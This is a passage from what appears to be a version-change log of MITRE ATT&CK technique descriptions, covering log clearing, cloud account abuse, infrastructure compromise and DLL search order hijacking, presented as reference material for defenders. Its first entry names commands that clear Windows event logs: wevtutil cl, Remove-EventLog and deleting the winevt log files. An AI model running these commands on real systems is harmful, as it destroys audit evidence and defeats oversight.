descriptionAdversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit. The event logs can be cleared with the following utility commands: * wevtutil cl system * wevtutil cl application * wevtutil cl security These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit. With administrator privileges, the event logs can be cleared with the following utility commands: * wevtutil cl system * wevtutil cl application * wevtutil cl security These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging) Adversaries may also attempt to clear logs by directly deleting the stored log files within `C:\Windows\System32\winevt\logs\`.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4

[T1136.003] Create Account: Cloud Account

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may create a cloud account to maintain access tot1Adversaries may create a cloud account to maintain access to
> victim systems. With a sufficient level of access, such acc> victim systems. With a sufficient level of access, such acc
>ounts may be used to establish secondary credentialed access>ounts may be used to establish secondary credentialed access
> that does not require persistent remote access tools to be > that does not require persistent remote access tools to be 
>deployed on the system.(Citation: Microsoft O365 Admin Roles>deployed on the system.(Citation: Microsoft O365 Admin Roles
>)(Citation: Microsoft Support O365 Add Another Admin, Octobe>)(Citation: Microsoft Support O365 Add Another Admin, Octobe
>r 2019)(Citation: AWS Create IAM User)(Citation: GCP Create >r 2019)(Citation: AWS Create IAM User)(Citation: GCP Create 
>Cloud Identity Users)(Citation: Microsoft Azure AD Users)  A>Cloud Identity Users)(Citation: Microsoft Azure AD Users)  I
>dversaries may create accounts that only have access to spec>n addition to user accounts, cloud accounts may be associate
>ific cloud services, which can reduce the chance of detectio>d with services. Cloud providers handle the concept of servi
>n.  Once an adversary has created a cloud account, they can >ce accounts in different ways. In Azure, service accounts in
>then manipulate that account to ensure persistence and allow>clude service principals and managed identities, which can b
> access to additional resources - for example, by adding [Ad>e linked to various resources such as OAuth applications, se
>ditional Cloud Credentials](https://attack.mitre.org/techniq>rverless functions, and virtual machines in order to grant t
>ues/T1098/001) or assigning [Additional Cloud Roles](https:/>hose resources permissions to perform various activities in 
>/attack.mitre.org/techniques/T1098/003).>the environment.(Citation: Microsoft Entra ID Service Princi
 >pals) In GCP, service accounts can also be linked to specifi
 >c resources, as well as be impersonated by other accounts fo
 >r [Temporary Elevated Cloud Access](https://attack.mitre.org
 >/techniques/T1548/005).(Citation: GCP Service Accounts) Whil
 >e AWS has no specific concept of service accounts, resources
 > can be directly granted permission to assume roles.(Citatio
 >n: AWS Instance Profiles)(Citation: AWS Lambda Execution Rol
 >e)  Adversaries may create accounts that only have access to
 > specific cloud services, which can reduce the chance of det
 >ection.  Once an adversary has created a cloud account, they
 > can then manipulate that account to ensure persistence and 
 >allow access to additional resources - for example, by addin
 >g [Additional Cloud Credentials](https://attack.mitre.org/te
 >chniques/T1098/001) or assigning [Additional Cloud Roles](ht
 >tps://attack.mitre.org/techniques/T1098/003).
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-16 17:34:42.544000+00:002024-03-28 16:14:28.678000+00:00
descriptionAdversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) In addition to user accounts, cloud accounts may be associated with services. Cloud providers handle the concept of service accounts in different ways. In Azure, service accounts include service principals and managed identities, which can be linked to various resources such as OAuth applications, serverless functions, and virtual machines in order to grant those resources permissions to perform various activities in the environment.(Citation: Microsoft Entra ID Service Principals) In GCP, service accounts can also be linked to specific resources, as well as be impersonated by other accounts for [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005).(Citation: GCP Service Accounts) While AWS has no specific concept of service accounts, resources can be directly granted permission to assume roles.(Citation: AWS Instance Profiles)(Citation: AWS Lambda Execution Role) Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'AWS Lambda Execution Role', 'description': 'AWS. (n.d.). Lambda execution role. Retrieved February 28, 2024.', 'url': 'https://docs.aws.amazon.com/lambda/latest/dg/lambda-intro-execution-role.html'}
external_references{'source_name': 'AWS Instance Profiles', 'description': 'AWS. (n.d.). Using instance profiles. Retrieved February 28, 2024.', 'url': 'https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_switch-role-ec2_instance-profiles.html'}
external_references{'source_name': 'GCP Service Accounts', 'description': 'Google. (n.d.). Service Accounts Overview. Retrieved February 28, 2024.', 'url': 'https://cloud.google.com/iam/docs/service-account-overview'}
external_references{'source_name': 'Microsoft Entra ID Service Principals', 'description': 'Microsoft. (2023, December 15). Application and service principal objects in Microsoft Entra ID. Retrieved February 28, 2024.', 'url': 'https://learn.microsoft.com/en-us/entra/identity-platform/app-objects-and-service-principals?tabs=browser'}

[T1078.004] Valid Accounts: Cloud Accounts

Current version: 1.7

Version changed from: 1.6 → 1.7


Old Description
New Description
t1Valid accounts in cloud environments may allow adversaries tt1Valid accounts in cloud environments may allow adversaries t
>o perform actions to achieve Initial Access, Persistence, Pr>o perform actions to achieve Initial Access, Persistence, Pr
>ivilege Escalation, or Defense Evasion. Cloud accounts are t>ivilege Escalation, or Defense Evasion. Cloud accounts are t
>hose created and configured by an organization for use by us>hose created and configured by an organization for use by us
>ers, remote support, services, or for administration of reso>ers, remote support, services, or for administration of reso
>urces within a cloud service provider or SaaS application. C>urces within a cloud service provider or SaaS application. C
>loud Accounts can exist solely in the cloud or be hybrid joi>loud Accounts can exist solely in the cloud; alternatively, 
>ned between on-premises systems and the cloud through federa>they may be hybrid-joined between on-premises systems and th
>tion with other identity sources such as Windows Active Dire>e cloud through syncing or federation with other identity so
>ctory. (Citation: AWS Identity Federation)(Citation: Google >urces such as Windows Active Directory. (Citation: AWS Ident
>Federating GC)(Citation: Microsoft Deploying AD Federation) >ity Federation)(Citation: Google Federating GC)(Citation: Mi
> Service or user accounts may be targeted by adversaries thr>crosoft Deploying AD Federation)  Service or user accounts m
>ough [Brute Force](https://attack.mitre.org/techniques/T1110>ay be targeted by adversaries through [Brute Force](https://
>), [Phishing](https://attack.mitre.org/techniques/T1566), or>attack.mitre.org/techniques/T1110), [Phishing](https://attac
> various other means to gain access to the environment. Fede>k.mitre.org/techniques/T1566), or various other means to gai
>rated accounts may be a pathway for the adversary to affect >n access to the environment. Federated or synced accounts ma
>both on-premises systems and cloud environments.  An adversa>y be a pathway for the adversary to affect both on-premises 
>ry may create long lasting [Additional Cloud Credentials](ht>systems and cloud environments - for example, by leveraging 
>tps://attack.mitre.org/techniques/T1098/001) on a compromise>shared credentials to log onto [Remote Services](https://att
>d cloud account to maintain persistence in the environment. >ack.mitre.org/techniques/T1021). High privileged cloud accou
>Such credentials may also be used to bypass security control>nts, whether federated, synced, or cloud-only, may also allo
>s such as multi-factor authentication.   Cloud accounts may >w pivoting to on-premises environments by leveraging SaaS-ba
>also be able to assume [Temporary Elevated Cloud Access](htt>sed [Software Deployment Tools](https://attack.mitre.org/tec
>ps://attack.mitre.org/techniques/T1548/005) or other privile>hniques/T1072) to run commands on hybrid-joined devices.  An
>ges through various means within the environment. Misconfigu> adversary may create long lasting [Additional Cloud Credent
>rations in role assignments or role assumption policies may >ials](https://attack.mitre.org/techniques/T1098/001) on a co
>allow an adversary to use these mechanisms to leverage permi>mpromised cloud account to maintain persistence in the envir
>ssions outside the intended scope of the account. Such over >onment. Such credentials may also be used to bypass security
>privileged accounts may be used to harvest sensitive data fr> controls such as multi-factor authentication.   Cloud accou
>om online storage accounts and databases through [Cloud API]>nts may also be able to assume [Temporary Elevated Cloud Acc
>(https://attack.mitre.org/techniques/T1059/009) or other met>ess](https://attack.mitre.org/techniques/T1548/005) or other
>hods.  > privileges through various means within the environment. Mi
 >sconfigurations in role assignments or role assumption polic
 >ies may allow an adversary to use these mechanisms to levera
 >ge permissions outside the intended scope of the account. Su
 >ch over privileged accounts may be used to harvest sensitive
 > data from online storage accounts and databases through [Cl
 >oud API](https://attack.mitre.org/techniques/T1059/009) or o
 >ther methods.  
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-16 17:25:38.546000+00:002024-03-29 15:42:13.499000+00:00
descriptionValid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud or be hybrid joined between on-premises systems and the cloud through federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments. An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods. Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices. An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods.
x_mitre_version1.61.7

[T1538] Cloud Service Dashboard

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-16 16:51:02.852000+00:002024-04-19 04:25:33.300000+00:00
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsObsidian Security
x_mitre_platformsSaaS

[T1584] Compromise Infrastructure

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may compromise third-party infrastructure that ct1Adversaries may compromise third-party infrastructure that c
>an be used during targeting. Infrastructure solutions includ>an be used during targeting. Infrastructure solutions includ
>e physical or cloud servers, domains, and third-party web an>e physical or cloud servers, domains, network devices, and t
>d DNS services. Instead of buying, leasing, or renting infra>hird-party web and DNS services. Instead of buying, leasing,
>structure an adversary may compromise infrastructure and use> or renting infrastructure an adversary may compromise infra
> it during other phases of the adversary lifecycle.(Citation>structure and use it during other phases of the adversary li
>: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citatio>fecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameH
>n: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens >ijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: Fir
>Part 2) Additionally, adversaries may compromise numerous ma>eEye EPS Awakens Part 2) Additionally, adversaries may compr
>chines to form a botnet they can leverage.  Use of compromis>omise numerous machines to form a botnet they can leverage. 
>ed infrastructure allows adversaries to stage, launch, and e> Use of compromised infrastructure allows adversaries to sta
>xecute operations. Compromised infrastructure can help adver>ge, launch, and execute operations. Compromised infrastructu
>sary operations blend in with traffic that is seen as normal>re can help adversary operations blend in with traffic that 
>, such as contact with high reputation or trusted sites. For>is seen as normal, such as contact with high reputation or t
> example, adversaries may leverage compromised infrastructur>rusted sites. For example, adversaries may leverage compromi
>e (potentially also in conjunction with [Digital Certificate>sed infrastructure (potentially also in conjunction with [Di
>s](https://attack.mitre.org/techniques/T1588/004)) to furthe>gital Certificates](https://attack.mitre.org/techniques/T158
>r blend in and support staged information gathering and/or [>8/004)) to further blend in and support staged information g
>Phishing](https://attack.mitre.org/techniques/T1566) campaig>athering and/or [Phishing](https://attack.mitre.org/techniqu
>ns.(Citation: FireEye DNS Hijack 2019) Additionally, adversa>es/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Addi
>ries may also compromise infrastructure to support [Proxy](h>tionally, adversaries may also compromise infrastructure to 
>ttps://attack.mitre.org/techniques/T1090) and/or proxyware s>support [Proxy](https://attack.mitre.org/techniques/T1090) a
>ervices.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Pro>nd/or proxyware services.(Citation: amnesty_nso_pegasus)(Cit
>xyjacking)  By using compromised infrastructure, adversaries>ation: Sysdig Proxyjacking)  By using compromised infrastruc
> may make it difficult to tie their actions back to them. Pr>ture, adversaries may make it difficult to tie their actions
>ior to targeting, adversaries may compromise the infrastruct> back to them. Prior to targeting, adversaries may compromis
>ure of other adversaries.(Citation: NSA NCSC Turla OilRig)>e the infrastructure of other adversaries.(Citation: NSA NCS
 >C Turla OilRig)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-02 01:10:49.053000+00:002024-03-28 03:53:28.299000+00:00
descriptionAdversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
x_mitre_version1.41.5

[T1195.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-28 16:03:59.172000+00:002024-04-13 14:47:31.204000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[T1543] Create or Modify System Process

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 16:52:58.415000+00:002024-02-15 14:14:03.942000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesContainer: Container Creation
x_mitre_platformsContainers

[T1110.004] Brute Force: Credential Stuffing

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-16 16:53:12.789000+00:002024-03-07 14:28:02.910000+00:00
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1555] Credentials from Password Stores

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may search for common password storage locationst1Adversaries may search for common password storage locations
> to obtain user credentials. Passwords are stored in several> to obtain user credentials.(Citation: F-Secure The Dukes) P
> places on a system, depending on the operating system or ap>asswords are stored in several places on a system, depending
>plication holding the credentials. There are also specific a> on the operating system or application holding the credenti
>pplications and services that store passwords to make them e>als. There are also specific applications and services that 
>asier for users to manage and maintain, such as password man>store passwords to make them easier for users to manage and 
>agers and cloud secrets vaults. Once credentials are obtaine>maintain, such as password managers and cloud secrets vaults
>d, they can be used to perform lateral movement and access r>. Once credentials are obtained, they can be used to perform
>estricted information.> lateral movement and access restricted information.

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-30 20:16:41.759000+00:002024-02-26 14:19:09.417000+00:00
descriptionAdversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'F-Secure The Dukes', 'description': 'F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.', 'url': 'https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf'}

[T1574.001] Hijack Execution Flow: DLL Search Order Hijacking

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may execute their own malicious payloads by hijat1Adversaries may execute their own malicious payloads by hija
>cking the search order used to load DLLs. Windows systems us>cking the search order used to load DLLs. Windows systems us
>e a common method to look for required DLLs to load into a p>e a common method to look for required DLLs to load into a p
>rogram. (Citation: Microsoft Dynamic Link Library Search Ord>rogram. (Citation: Microsoft Dynamic Link Library Search Ord
>er)(Citation: FireEye Hijacking July 2010) Hijacking DLL loa>er)(Citation: FireEye Hijacking July 2010) Hijacking DLL loa
>ds may be for the purpose of establishing persistence as wel>ds may be for the purpose of establishing persistence as wel
>l as elevating privileges and/or evading restrictions on fil>l as elevating privileges and/or evading restrictions on fil
>e execution.  There are many ways an adversary can hijack DL>e execution.  There are many ways an adversary can hijack DL
>L loads. Adversaries may plant trojan dynamic-link library f>L loads. Adversaries may plant trojan dynamic-link library f
>iles (DLLs) in a directory that will be searched before the >iles (DLLs) in a directory that will be searched before the 
>location of a legitimate library that will be requested by a>location of a legitimate library that will be requested by a
> program, causing Windows to load their malicious library wh> program, causing Windows to load their malicious library wh
>en it is called for by the victim program. Adversaries may a>en it is called for by the victim program. Adversaries may a
>lso perform DLL preloading, also called binary planting atta>lso perform DLL preloading, also called binary planting atta
>cks, (Citation: OWASP Binary Planting) by placing a maliciou>cks, (Citation: OWASP Binary Planting) by placing a maliciou
>s DLL with the same name as an ambiguously specified DLL in >s DLL with the same name as an ambiguously specified DLL in 
>a location that Windows searches before the legitimate DLL. >a location that Windows searches before the legitimate DLL. 
>Often this location is the current working directory of the >Often this location is the current working directory of the 
>program.(Citation: FireEye fxsst June 2011) Remote DLL prelo>program.(Citation: FireEye fxsst June 2011) Remote DLL prelo
>ading attacks occur when a program sets its current director>ading attacks occur when a program sets its current director
>y to a remote location such as a Web share before loading a >y to a remote location such as a Web share before loading a 
>DLL. (Citation: Microsoft Security Advisory 2269637)  Advers>DLL. (Citation: Microsoft Security Advisory 2269637)  Phanto
>aries may also directly modify the search order via DLL redi>m DLL hijacking is a specific type of DLL search order hijac
>rection, which after being enabled (in the Registry and crea>king where adversaries target references to non-existent DLL
>tion of a redirection file) may cause a program to load a di> files.(Citation: Adversaries Hijack DLLs) They may be able 
>fferent DLL.(Citation: Microsoft Dynamic-Link Library Redire>to load their own malicious DLL by planting it with the corr
>ction)(Citation: Microsoft Manifests)(Citation: FireEye DLL >ect name in the location of the missing module.  Adversaries
>Search Order Hijacking)  If a search order-vulnerable progra> may also directly modify the search order via DLL redirecti
>m is configured to run at a higher privilege level, then the>on, which after being enabled (in the Registry and creation 
> adversary-controlled DLL that is loaded will also be execut>of a redirection file) may cause a program to load a differe
>ed at the higher level. In this case, the technique could be>nt DLL.(Citation: Microsoft Dynamic-Link Library Redirection
> used for privilege escalation from user to administrator or>)(Citation: Microsoft Manifests)(Citation: FireEye DLL Searc
> SYSTEM or from administrator to SYSTEM, depending on the pr>h Order Hijacking)  If a search order-vulnerable program is 
>ogram. Programs that fall victim to path hijacking may appea>configured to run at a higher privilege level, then the adve
>r to behave normally because malicious DLLs may be configure>rsary-controlled DLL that is loaded will also be executed at
>d to also load the legitimate DLLs they were meant to replac> the higher level. In this case, the technique could be used
>e.> for privilege escalation from user to administrator or SYST
 >EM or from administrator to SYSTEM, depending on the program
 >. Programs that fall victim to path hijacking may appear to 
 >behave normally because malicious DLLs may be configured to 
 >also load the legitimate DLLs they were meant to replace.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:51.098000+00:002024-04-18 22:54:54.668000+00:00
descriptionAdversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module. Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Adversaries Hijack DLLs', 'description': 'CrowdStrike, Falcon OverWatch Team. (2022, December 30). Retrieved October 19, 2023.', 'url': 'https://www.crowdstrike.com/blog/4-ways-adversaries-hijack-dlls/'}
x_mitre_contributorsMarina Liang
x_mitre_contributorsWill Alexander
x_mitre_contributorsAmi Holeston

[T1071.004] Application Layer Protocol: DNS

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-06-17 13:52:03.232000+00:002023-12-26 20:54:38.721000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1213] Data from Information Repositories

Current version: 3.3

Version changed from: 3.2 → 3.3

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 22:28:36.395000+00:002024-03-01 16:27:47.391000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version3.23.3

[T1078.001] Valid Accounts: Default Accounts

Current version: 1.3

Version changed from: 1.2 → 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:44.382000+00:002024-03-07 14:27:04.770000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1610] Deploy Container

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may deploy a container into an environment to fat1Adversaries may deploy a container into an environment to fa
>cilitate execution or evade defenses. In some cases, adversa>cilitate execution or evade defenses. In some cases, adversa
>ries may deploy a new container to execute processes associa>ries may deploy a new container to execute processes associa
>ted with a particular image or deployment, such as processes>ted with a particular image or deployment, such as processes
